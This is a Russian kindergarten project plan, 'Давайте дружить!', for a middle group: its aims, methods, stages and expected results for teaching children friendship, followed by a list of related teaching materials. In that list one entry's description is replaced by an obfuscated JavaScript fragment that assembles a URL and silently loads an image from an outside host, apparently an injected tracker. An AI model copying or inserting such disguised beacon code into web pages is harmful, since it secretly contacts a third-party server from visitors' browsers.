Проект "Давайте Дружить!"
проект (средняя группа)
Предварительный просмотр:
Проект
"Давайте дружить!"
(в средней группе "Теремок")
Подготовила: Коваленко Е.В.
Актуальность проекта: Большинство детей в 4-5-х летнем возрасте не могут играть дружно друг с другом длительное время, ссорятся, дерутся, жадничают. Так как именно общение со сверстниками играет важную роль в нравственном развитии ребенка, то важной задачей дошкольной педагогики является формирование взаимоотношений, влияющих на становление общественно ценных качеств личности ребенка, определяющих его поведение в обществе сверстников.
Участники проекта: воспитанники 4-5 лет, воспитатели, родители.
Тип проекта: информационно-творческий.
Вид проекта: групповой, долгосрочный.
Продолжительность: 4 месяца (сентябрь-декабрь)
Цель: воспитание дружеских чувств: доверия, взаимовыручки, сопереживания, создание дружеских отношений в группе.
Задачи проекта:
Воспитательные:
1. Воспитание культуры поведения и общения, привычки следовать правилам культуры, быть вежливым по отношению к людям.
2. Воспитывать чувство коллективизма, сплоченности, умение работать в команде.
Развивающие:
1. Развитие добрых чувств, эмоциональной отзывчивости, умения различать настроение и эмоциональное состояние окружающих людей и учитывать это в своем поведении.
2. Развивать коммуникативные навыки, социально-коммуникативные качества .
3. Развивать связную речь, обогащать словарный запас, побуждать к использованию в речи пословиц и поговорок.
Обучающие:
1. Расширять и систематизировать представления детей о том, что значит «Уметь дружить», научить осмысливать и оценивать ситуацию, самостоятельно понимать мотивы поведения и соотносить эти мотивы существующим нормам поведения.
2. Способствовать формированию личного отношения ребенка к соблюдению и нарушению моральных норм: сочувствие обиженному и несогласие с действиями обидчика; одобрение действий того, кто поступил справедливо;
Методы:
1. Словесные
2. Игровые
3. Наглядные
4. Практические.
Приёмы:
1. Беседы
2. Наблюдения,
3. Чтение художественной литературы,
4. Игры.
Ожидаемый результат:
1. Дети стали более раскрепощенными и общительными;
2. Большинство детей научились объединяться для игры в группы по 3-4 человека;
3. У детей стали формироваться дружеские предпочтения в групповом сообществе;
4. У отдельных детей можно отметить проявление сочувствия к другому ребёнку;
5. Дети научились мириться друг с другом с помощью стихов - мирилок.
Этапы реализации проекта:
I этап – подготовительный
• Изучение и анализ психолого-педагогической и методической литературы по теме «Дружба», «Детский коллектив».
• Разработка проекта по реализации задач в процессе совместной деятельности по теме «Давайте дружить». Составление плана.
• Подбор методической и художественной литературы, подбор наглядного материала, дидактических игр, музыкального сопровождения, создание картотеки мирилок и считалок.
• Работа с родителями. Домашние задания: порекомендовать чтение произведений о дружбе детям, подобрать и выучить с ребенком пословицу или поговорку о дружбе, составить вместе с ребенком рассказ о его друге, выучить мирилку из созданной картотеки.
• Беседа «О дружных ребятах». Создание с детьми коллективной аппликации «Дерево дружбы нашей группы».
II этап - практический
Этические беседы, ситуативные разговоры, рассказы детей, пословицы и поговорки о дружбе; чтение художественной литературы с последующей беседой, рассматривание картинок с развивающим диалогом, словесные, коммуникативные игры, подвижные, дидактические игры, упражнения подражательно-исполнительского и творческого характера, пальчиковая гимнастика, игры на развитие навыков общения, создание выставки «Подарок для друга своими руками!».
III этап – заключительный
1 | Коллективная аппликация «Дерево дружбы» (дети и воспитатель) | сентябрь |
2 | Спортивный досуг «Давай дружить!» (воспитатель, дети и родители) | октябрь |
3 | Драматизация сказки "Теремок" (воспитатель и родители) Оформление мини-музея «Мои любимые игрушки-друзья» | ноябрь |
4 | Создание выставки «Подарок для друга своими руками!». (воспитатель, дети и родители) | декабрь |
План реализации проекта
По теме: методические разработки, презентации и конспекты
Проект «C туризмом дружит вся семья» (старший дошкольный возраст)
Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....
Если хочешь долго жить - научись с огнем дружить!
Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....
Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"
Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...
Конспект занятия "Давайте дружить"
Конспект занятия по развитию речи в 1 младшей группе....
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...